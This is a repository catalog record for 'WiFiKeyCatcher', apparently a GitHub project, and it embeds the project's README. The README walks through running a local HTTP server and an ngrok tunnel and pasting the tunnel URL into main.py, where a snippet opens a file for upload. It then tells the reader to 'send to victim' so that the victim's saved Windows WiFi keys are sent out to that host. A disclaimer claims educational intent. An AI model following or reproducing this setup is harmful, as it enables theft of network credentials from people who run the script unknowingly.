{"id":23034750,"url":"https://github.com/ibnaleem/wifikeycatcher","last_synced_at":"2026-04-11T21:41:00.158Z","repository":{"id":189171486,"uuid":"680177309","full_name":"ibnaleem/WiFiKeyCatcher","owner":"ibnaleem","description":"A Python Script That Extracts All WiFi Keys Saved on Windows OS","archived":false,"fork":false,"pushed_at":"2023-09-12T08:22:54.000Z","size":13,"stargazers_count":2,"open_issues_count":1,"forks_count":0,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-08-03T08:41:30.467Z","etag":null,"topics":["hacking-tool","hacking-tools","offensive-scripts","redteam","redteam-tools","redteaming","wifi-hacking","wifi-hotspot","wifi-network","wifi-password","wifi-security","windows","windows-10"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ibnaleem.png","metadata":{"files":{"readme":"docs/README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-08-18T14:25:48.000Z","updated_at":"2023-09-12T08:31:09.000Z","dependencies_parsed_at":"2024-12-15T16:46:15.433Z","dependency_job_id":null,"html_url":"https://github.com/ibnaleem/WiFiKeyCatcher","commit_stats":null,"previous_names":["ibnaleem/wifikeycatcher"],"tags_count":2,"template":false,"template_full_name":null,"purl":"pkg:github/ibnaleem/WiFiKeyCatcher","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ibnaleem%2FWiFiKeyCatcher","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ibnaleem%2FWiFiKeyCatcher/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ibnaleem%2FWiFiKeyCatcher/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ibnaleem%2FWiFiKeyCatcher/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ibnaleem","download_url":"https://codeload.github.com/ibnaleem/WiFiKeyCatcher/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ibnaleem%2FWiFiKeyCatcher/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":31696743,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-11T21:17:31.016Z","status":"ssl_error","status_checked_at":"2026-04-11T21:17:24.556Z","response_time":54,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["hacking-tool","hacking-tools","offensive-scripts","redteam","redteam-tools","redteaming","wifi-hacking","wifi-hotspot","wifi-network","wifi-password","wifi-security","windows","windows-10"],"created_at":"2024-12-15T16:35:30.353Z","updated_at":"2026-04-11T21:41:00.127Z","avatar_url":"https://github.com/ibnaleem.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003cp align=\"center\"\u003e\n  \u003cimg src=\"https://logos-world.net/wp-content/uploads/2022/03/Wi-Fi-Logo.png\"/\u003e\n\u003c/p\u003e\n \u003ch3\u003e\u003cp align=\"center\"\u003e\n    ⚠️ Disclaimer: This repository is intended for educational purposes exclusively. I bear no responsibility for any illicit or unauthorized use of this project.\n\u003c/p\u003e\u003c/h3\u003e\n\u003c/p\u003e\n\u003cp align=\"center\"\u003e\n  \u003cimg src=\"https://img.shields.io/badge/Version-1.0.0-green\" alt=\"\"/\u003e\n  \u003cimg src=\"https://img.shields.io/badge/Written in-Python-blue\" alt=\"\"/\u003e\n  \u003cimg src=\"https://img.shields.io/badge/Author-Ibn Aleem-red\" alt=\"\"/\u003e\n\u003c/p\u003e\n\n# Setup\n1. Clone this repository:\n```\n$ git clone https://github.com/ibnaleem/WiFiKeyCatcher.git\n```\n2. Run `HTTPServer`:\n```\n$ py -m http.server\n```\n3. [Install ngrok](https://ngrok.com/download)\n4. Configure auth-token in terminal:\n```\n$ ngrok config add-authtoken \u003ctoken\u003e\n```\n5. Start tunnel on port 8000:\n```\n$ ngrok http 8000\n```\nIf successful, you should see all of your system directories as embeded links.\n\n6. Copy ngrok URL and paste into `main.py` (line 52):\n```python\nurl = \"https://ngrok-url-here\"\nfiles = {'file': open(f'{curr_path}.txt', 'rb')}\n```\n\nSave and send to victim. Note: ngrok must be running to obtain WiFi-Keys\n\n#### Target Ran Script, Nothing Received\nMake sure your target has Python installed, and you're running HTTP server + ngrok\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fibnaleem%2Fwifikeycatcher","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fibnaleem%2Fwifikeycatcher","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fibnaleem%2Fwifikeycatcher/lists"}